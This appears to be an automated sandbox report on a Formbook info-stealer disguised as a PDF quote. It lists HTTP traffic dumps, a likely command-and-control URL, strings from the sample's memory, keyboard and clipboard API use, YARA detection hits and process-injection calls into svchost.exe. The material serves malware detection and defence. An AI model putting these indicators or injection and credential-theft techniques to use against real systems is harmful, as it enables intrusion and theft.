65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Fri, 11 Oct 2024 14:48:24 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Fri, 11 Oct 2024 14:48:27 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Fri, 11 Oct 2024 14:48:29 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: csDaoUagQFfwf.exe, 00000007.00000002.3587672328.000000000566F000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.030002832.xyz
            Source: csDaoUagQFfwf.exe, 00000007.00000002.3587672328.000000000566F000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.030002832.xyz/k59q/
            Source: isoburn.exe, 00000006.00000002.3588182067.000000000820E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: isoburn.exe, 00000006.00000002.3588182067.000000000820E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: isoburn.exe, 00000006.00000002.3588182067.000000000820E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: isoburn.exe, 00000006.00000002.3588182067.000000000820E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: isoburn.exe, 00000006.00000002.3588182067.000000000820E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: isoburn.exe, 00000006.00000002.3588182067.000000000820E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: isoburn.exe, 00000006.00000002.3588182067.000000000820E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: isoburn.exe, 00000006.00000002.3584832817.0000000003305000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: isoburn.exe, 00000006.00000002.3584832817.0000000003327000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: isoburn.exe, 00000006.00000002.3584832817.0000000003305000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: isoburn.exe, 00000006.00000002.3584832817.0000000003305000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033u
            Source: isoburn.exe, 00000006.00000002.3584832817.0000000003305000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: isoburn.exe, 00000006.00000003.2312297989.00000000081ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: isoburn.exe, 00000006.00000002.3588182067.000000000820E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00ED407C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00ED407C
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00ED427A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00ED427A
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00ED407C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00ED407C
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00EC003A GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00EC003A
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00EECB26 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00EECB26

            E-Banking Fraud

            barindex
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.3585567216.0000000004D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3587672328.0000000005600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2123235941.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2123644785.00000000037F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3585604704.0000000004DE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2124174158.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3584633901.00000000030D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3585641662.0000000003050000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3585567216.0000000004D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.3587672328.0000000005600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2123235941.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2123644785.00000000037F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3585604704.0000000004DE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2124174158.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3584633901.00000000030D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3585641662.0000000003050000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: This is a third-party compiled AutoIt script.0_2_00E63B4C
            Source: quote894590895pdf.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: quote894590895pdf.exe, 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_c96ee0e7-7
            Source: quote894590895pdf.exe, 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"memstr_7e2c2579-5
            Source: quote894590895pdf.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_3435ba26-f
            Source: quote894590895pdf.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"memstr_d36b393b-c
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042C353 NtClose,1_2_0042C353
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972B60 NtClose,LdrInitializeThunk,1_2_03972B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03972DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039735C0 NtCreateMutant,LdrInitializeThunk,1_2_039735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03974340 NtSetContextThread,1_2_03974340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03974650 NtSuspendThread,1_2_03974650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972B80 NtQueryInformationFile,1_2_03972B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972BA0 NtEnumerateValueKey,1_2_03972BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972BF0 NtAllocateVirtualMemory,1_2_03972BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972BE0 NtQueryValueKey,1_2_03972BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972AB0 NtWaitForSingleObject,1_2_03972AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972AD0 NtReadFile,1_2_03972AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972AF0 NtWriteFile,1_2_03972AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972F90 NtProtectVirtualMemory,1_2_03972F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972FB0 NtResumeThread,1_2_03972FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972FA0 NtQuerySection,1_2_03972FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972FE0 NtCreateFile,1_2_03972FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972F30 NtCreateSection,1_2_03972F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972F60 NtCreateProcessEx,1_2_03972F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972E80 NtReadVirtualMemory,1_2_03972E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972EA0 NtAdjustPrivilegesToken,1_2_03972EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972EE0 NtQueueApcThread,1_2_03972EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972E30 NtWriteVirtualMemory,1_2_03972E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972DB0 NtEnumerateKey,1_2_03972DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972DD0 NtDelayExecution,1_2_03972DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972D10 NtMapViewOfSection,1_2_03972D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972D00 NtSetInformationFile,1_2_03972D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972D30 NtUnmapViewOfSection,1_2_03972D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972CA0 NtQueryInformationToken,1_2_03972CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972CC0 NtQueryVirtualMemory,1_2_03972CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972CF0 NtOpenProcess,1_2_03972CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972C00 NtQueryInformationProcess,1_2_03972C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972C70 NtFreeVirtualMemory,1_2_03972C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972C60 NtCreateKey,1_2_03972C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03973090 NtSetValueKey,1_2_03973090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03973010 NtOpenDirectoryObject,1_2_03973010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039739B0 NtGetContextThread,1_2_039739B0
